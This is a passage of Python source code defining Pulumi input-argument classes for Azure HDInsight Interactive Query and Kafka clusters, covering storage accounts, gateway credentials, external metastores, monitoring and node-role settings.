    def msi_resource_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "msi_resource_id", val)

    @property
    @pulumi.getter(name="clusterUsersGroupDns")
    def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Distinguished names of the cluster user groups. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "cluster_users_group_dns")

    @cluster_users_group_dns.setter
    def cluster_users_group_dns(self, val: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "cluster_users_group_dns", val)
@pulumi.input_type
class InteractiveQueryClusterStorageAccountArgs:
    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        A classic (blob) Storage Account attached to the cluster.

        :param pulumi.Input[bool] is_default: Whether this is the Default Storage Account for the HDInsight Hadoop Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_key: Access Key used to connect to the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_container_id: ID of the Storage Container. Changing this forces a new resource to be created.
        """
        for attr, arg in (("is_default", is_default),
                          ("storage_account_key", storage_account_key),
                          ("storage_container_id", storage_container_id)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """
        Whether this is the Default Storage Account for the HDInsight Hadoop Cluster. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, val: pulumi.Input[bool]):
        pulumi.set(self, "is_default", val)

    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """
        Access Key used to connect to the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_key")

    @storage_account_key.setter
    def storage_account_key(self, val: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", val)

    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """
        ID of the Storage Container. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_container_id")

    @storage_container_id.setter
    def storage_container_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", val)
@pulumi.input_type
class InteractiveQueryClusterStorageAccountGen2Args:
    def __init__(__self__, *,
                 filesystem_id: pulumi.Input[str],
                 is_default: pulumi.Input[bool],
                 managed_identity_resource_id: pulumi.Input[str],
                 storage_resource_id: pulumi.Input[str]):
        """
        A Data Lake Storage Gen2 account attached to the cluster.

        :param pulumi.Input[str] filesystem_id: ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] is_default: Whether this is the Default Storage Account for the HDInsight Hadoop Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[str] managed_identity_resource_id: ID of the Managed Identity used to access the Gen2 filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_resource_id: ID of the Storage Account. Changing this forces a new resource to be created.
        """
        for attr, arg in (("filesystem_id", filesystem_id),
                          ("is_default", is_default),
                          ("managed_identity_resource_id", managed_identity_resource_id),
                          ("storage_resource_id", storage_resource_id)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="filesystemId")
    def filesystem_id(self) -> pulumi.Input[str]:
        """
        ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "filesystem_id")

    @filesystem_id.setter
    def filesystem_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "filesystem_id", val)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """
        Whether this is the Default Storage Account for the HDInsight Hadoop Cluster. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, val: pulumi.Input[bool]):
        pulumi.set(self, "is_default", val)

    @property
    @pulumi.getter(name="managedIdentityResourceId")
    def managed_identity_resource_id(self) -> pulumi.Input[str]:
        """
        ID of the Managed Identity used to access the Gen2 filesystem. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "managed_identity_resource_id")

    @managed_identity_resource_id.setter
    def managed_identity_resource_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "managed_identity_resource_id", val)

    @property
    @pulumi.getter(name="storageResourceId")
    def storage_resource_id(self) -> pulumi.Input[str]:
        """
        ID of the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_resource_id")

    @storage_resource_id.setter
    def storage_resource_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "storage_resource_id", val)
@pulumi.input_type
class KafkaClusterComponentVersionArgs:
    def __init__(__self__, *,
                 kafka: pulumi.Input[str]):
        """
        Component versions for the HDInsight Kafka Cluster.

        :param pulumi.Input[str] kafka: Version of Kafka to use for this HDInsight Kafka Cluster. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "kafka", kafka)

    @property
    @pulumi.getter
    def kafka(self) -> pulumi.Input[str]:
        """
        Version of Kafka to use for this HDInsight Kafka Cluster. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "kafka")

    @kafka.setter
    def kafka(self, val: pulumi.Input[str]):
        pulumi.set(self, "kafka", val)
@pulumi.input_type
class KafkaClusterGatewayArgs:
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Ambari gateway (portal) credentials for the HDInsight Kafka Cluster.

        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        # `enabled` is deprecated (the HDInsight API no longer supports disabling
        # the gateway): warn, but still record the value for backward compatibility.
        # The original code tested `enabled is not None` twice back-to-back; merged
        # into a single guard.
        if enabled is not None:
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The password used for the Ambari Portal.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The username used for the Ambari Portal. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class KafkaClusterMetastoresArgs:
    def __init__(__self__, *,
                 ambari: Optional[pulumi.Input['KafkaClusterMetastoresAmbariArgs']] = None,
                 hive: Optional[pulumi.Input['KafkaClusterMetastoresHiveArgs']] = None,
                 oozie: Optional[pulumi.Input['KafkaClusterMetastoresOozieArgs']] = None):
        """
        External metastore configuration for the HDInsight Kafka Cluster.

        :param pulumi.Input['KafkaClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
        :param pulumi.Input['KafkaClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
        :param pulumi.Input['KafkaClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
        """
        # Only record the metastore blocks that were actually supplied.
        for attr, arg in (("ambari", ambari), ("hive", hive), ("oozie", oozie)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def ambari(self) -> Optional[pulumi.Input['KafkaClusterMetastoresAmbariArgs']]:
        """
        An `ambari` block as defined below.
        """
        return pulumi.get(self, "ambari")

    @ambari.setter
    def ambari(self, val: Optional[pulumi.Input['KafkaClusterMetastoresAmbariArgs']]):
        pulumi.set(self, "ambari", val)

    @property
    @pulumi.getter
    def hive(self) -> Optional[pulumi.Input['KafkaClusterMetastoresHiveArgs']]:
        """
        A `hive` block as defined below.
        """
        return pulumi.get(self, "hive")

    @hive.setter
    def hive(self, val: Optional[pulumi.Input['KafkaClusterMetastoresHiveArgs']]):
        pulumi.set(self, "hive", val)

    @property
    @pulumi.getter
    def oozie(self) -> Optional[pulumi.Input['KafkaClusterMetastoresOozieArgs']]:
        """
        An `oozie` block as defined below.
        """
        return pulumi.get(self, "oozie")

    @oozie.setter
    def oozie(self, val: Optional[pulumi.Input['KafkaClusterMetastoresOozieArgs']]):
        pulumi.set(self, "oozie", val)
@pulumi.input_type
class KafkaClusterMetastoresAmbariArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        External Ambari metastore configuration.

        :param pulumi.Input[str] database_name: The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "server", server)
        pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")

    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class KafkaClusterMetastoresHiveArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        External Hive metastore configuration.

        :param pulumi.Input[str] database_name: Existing SQL database of the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: Existing SQL server admin password of the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: Fully-qualified domain name (FQDN) of the SQL server used for the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: Existing SQL server admin username of the external Hive metastore. Changing this forces a new resource to be created.
        """
        for attr, arg in (("database_name", database_name),
                          ("password", password),
                          ("server", server),
                          ("username", username)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        Existing SQL database of the external Hive metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, val: pulumi.Input[str]):
        pulumi.set(self, "database_name", val)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        Existing SQL server admin password of the external Hive metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, val: pulumi.Input[str]):
        pulumi.set(self, "password", val)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        Fully-qualified domain name (FQDN) of the SQL server used for the external Hive metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")

    @server.setter
    def server(self, val: pulumi.Input[str]):
        pulumi.set(self, "server", val)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        Existing SQL server admin username of the external Hive metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, val: pulumi.Input[str]):
        pulumi.set(self, "username", val)
@pulumi.input_type
class KafkaClusterMetastoresOozieArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        External Oozie metastore configuration.

        :param pulumi.Input[str] database_name: Existing SQL database of the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: Existing SQL server admin password of the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: Fully-qualified domain name (FQDN) of the SQL server used for the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: Existing SQL server admin username of the external Oozie metastore. Changing this forces a new resource to be created.
        """
        for attr, arg in (("database_name", database_name),
                          ("password", password),
                          ("server", server),
                          ("username", username)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        Existing SQL database of the external Oozie metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, val: pulumi.Input[str]):
        pulumi.set(self, "database_name", val)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        Existing SQL server admin password of the external Oozie metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, val: pulumi.Input[str]):
        pulumi.set(self, "password", val)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        Fully-qualified domain name (FQDN) of the SQL server used for the external Oozie metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")

    @server.setter
    def server(self, val: pulumi.Input[str]):
        pulumi.set(self, "server", val)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        Existing SQL server admin username of the external Oozie metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, val: pulumi.Input[str]):
        pulumi.set(self, "username", val)
@pulumi.input_type
class KafkaClusterMonitorArgs:
    def __init__(__self__, *,
                 log_analytics_workspace_id: pulumi.Input[str],
                 primary_key: pulumi.Input[str]):
        """
        Azure Monitor (OMS) integration settings for the cluster.

        :param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
        :param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
        """
        pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
        pulumi.set(__self__, "primary_key", primary_key)

    @property
    @pulumi.getter(name="logAnalyticsWorkspaceId")
    def log_analytics_workspace_id(self) -> pulumi.Input[str]:
        """
        The Operations Management Suite (OMS) workspace ID.
        """
        return pulumi.get(self, "log_analytics_workspace_id")

    @log_analytics_workspace_id.setter
    def log_analytics_workspace_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "log_analytics_workspace_id", val)

    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> pulumi.Input[str]:
        """
        The Operations Management Suite (OMS) workspace key.
        """
        return pulumi.get(self, "primary_key")

    @primary_key.setter
    def primary_key(self, val: pulumi.Input[str]):
        pulumi.set(self, "primary_key", val)
@pulumi.input_type
class KafkaClusterRestProxyArgs:
    def __init__(__self__, *,
                 security_group_id: pulumi.Input[str]):
        """
        Kafka REST proxy settings for the cluster.

        :param pulumi.Input[str] security_group_id: The Azure Active Directory Security Group ID.
        """
        pulumi.set(__self__, "security_group_id", security_group_id)

    @property
    @pulumi.getter(name="securityGroupId")
    def security_group_id(self) -> pulumi.Input[str]:
        """
        The Azure Active Directory Security Group ID.
        """
        return pulumi.get(self, "security_group_id")

    @security_group_id.setter
    def security_group_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "security_group_id", val)
@pulumi.input_type
class KafkaClusterRolesArgs:
    def __init__(__self__, *,
                 head_node: pulumi.Input['KafkaClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['KafkaClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['KafkaClusterRolesZookeeperNodeArgs'],
                 kafka_management_node: Optional[pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs']] = None):
        """
        The set of node roles that make up a Kafka HDInsight cluster.

        :param pulumi.Input['KafkaClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['KafkaClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['KafkaClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        :param pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs'] kafka_management_node: A `kafka_management_node` block as defined below.
        """
        # Required role blocks.
        for _name, _value in (
                ("head_node", head_node),
                ("worker_node", worker_node),
                ("zookeeper_node", zookeeper_node)):
            pulumi.set(__self__, _name, _value)
        # The management node role is optional.
        if kafka_management_node is not None:
            pulumi.set(__self__, "kafka_management_node", kafka_management_node)

    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['KafkaClusterRolesHeadNodeArgs']:
        """A `head_node` block as defined above."""
        return pulumi.get(self, "head_node")

    @head_node.setter
    def head_node(self, value: pulumi.Input['KafkaClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", value)

    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['KafkaClusterRolesWorkerNodeArgs']:
        """A `worker_node` block as defined below."""
        return pulumi.get(self, "worker_node")

    @worker_node.setter
    def worker_node(self, value: pulumi.Input['KafkaClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", value)

    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['KafkaClusterRolesZookeeperNodeArgs']:
        """A `zookeeper_node` block as defined below."""
        return pulumi.get(self, "zookeeper_node")

    @zookeeper_node.setter
    def zookeeper_node(self, value: pulumi.Input['KafkaClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", value)

    @property
    @pulumi.getter(name="kafkaManagementNode")
    def kafka_management_node(self) -> Optional[pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs']]:
        """A `kafka_management_node` block as defined below."""
        return pulumi.get(self, "kafka_management_node")

    @kafka_management_node.setter
    def kafka_management_node(self, value: Optional[pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs']]):
        pulumi.set(self, "kafka_management_node", value)
@pulumi.input_type
class KafkaClusterRolesHeadNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Head Node configuration for a Kafka HDInsight cluster.

        :param pulumi.Input[str] username: The local administrator username for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Virtual Machine size used for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The local administrator password for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH Keys for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet in which the Head Nodes are provisioned. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network in which the Head Nodes are provisioned. Changing this forces a new resource to be created.
        """
        # Required settings.
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are only recorded when a value was supplied.
        for _name, _value in (
                ("password", password),
                ("ssh_keys", ssh_keys),
                ("subnet_id", subnet_id),
                ("virtual_network_id", virtual_network_id)):
            if _value is not None:
                pulumi.set(__self__, _name, _value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The local administrator username for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Virtual Machine size used for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The local administrator password for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """SSH Keys for the local administrator on the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet in which the Head Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network in which the Head Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterRolesKafkaManagementNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Kafka Management Node configuration for a Kafka HDInsight cluster.

        :param pulumi.Input[str] username: The local administrator username for the Kafka Management Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Virtual Machine size used for the Kafka Management Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The local administrator password for the Kafka Management Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH Keys for the local administrator on the Kafka Management Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet in which the Kafka Management Nodes are provisioned. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network in which the Kafka Management Nodes are provisioned. Changing this forces a new resource to be created.
        """
        # Required settings.
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are only recorded when a value was supplied.
        for _name, _value in (
                ("password", password),
                ("ssh_keys", ssh_keys),
                ("subnet_id", subnet_id),
                ("virtual_network_id", virtual_network_id)):
            if _value is not None:
                pulumi.set(__self__, _name, _value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The local administrator username for the Kafka Management Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Virtual Machine size used for the Kafka Management Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The local administrator password for the Kafka Management Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """SSH Keys for the local administrator on the Kafka Management Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet in which the Kafka Management Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network in which the Kafka Management Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterRolesWorkerNodeArgs:
    def __init__(__self__, *,
                 number_of_disks_per_node: pulumi.Input[int],
                 target_instance_count: pulumi.Input[int],
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 min_instance_count: Optional[pulumi.Input[int]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Worker Node configuration for a Kafka HDInsight cluster.

        :param pulumi.Input[int] number_of_disks_per_node: The number of Data Disks assigned to each Worker Node, between 1 and 8. Changing this forces a new resource to be created.
        :param pulumi.Input[int] target_instance_count: The number of instances to run for the Worker Nodes.
        :param pulumi.Input[str] username: The local administrator username for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Virtual Machine size used for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[int] min_instance_count: The minimum number of instances to run for the Worker Nodes. Changing this forces a new resource to be created. Deprecated.
        :param pulumi.Input[str] password: The local administrator password for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH Keys for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet in which the Worker Nodes are provisioned. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network in which the Worker Nodes are provisioned. Changing this forces a new resource to be created.
        """
        # Required settings.
        for _name, _value in (
                ("number_of_disks_per_node", number_of_disks_per_node),
                ("target_instance_count", target_instance_count),
                ("username", username),
                ("vm_size", vm_size)):
            pulumi.set(__self__, _name, _value)
        # min_instance_count is deprecated but still honoured when supplied.
        if min_instance_count is not None:
            warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
            pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
            pulumi.set(__self__, "min_instance_count", min_instance_count)
        # Remaining optional settings are only recorded when a value was supplied.
        for _name, _value in (
                ("password", password),
                ("ssh_keys", ssh_keys),
                ("subnet_id", subnet_id),
                ("virtual_network_id", virtual_network_id)):
            if _value is not None:
                pulumi.set(__self__, _name, _value)

    @property
    @pulumi.getter(name="numberOfDisksPerNode")
    def number_of_disks_per_node(self) -> pulumi.Input[int]:
        """The number of Data Disks assigned to each Worker Node, between 1 and 8. Changing this forces a new resource to be created."""
        return pulumi.get(self, "number_of_disks_per_node")

    @number_of_disks_per_node.setter
    def number_of_disks_per_node(self, value: pulumi.Input[int]):
        pulumi.set(self, "number_of_disks_per_node", value)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """The number of instances to run for the Worker Nodes."""
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The local administrator username for the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Virtual Machine size used for the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """The minimum number of instances to run for the Worker Nodes. Changing this forces a new resource to be created."""
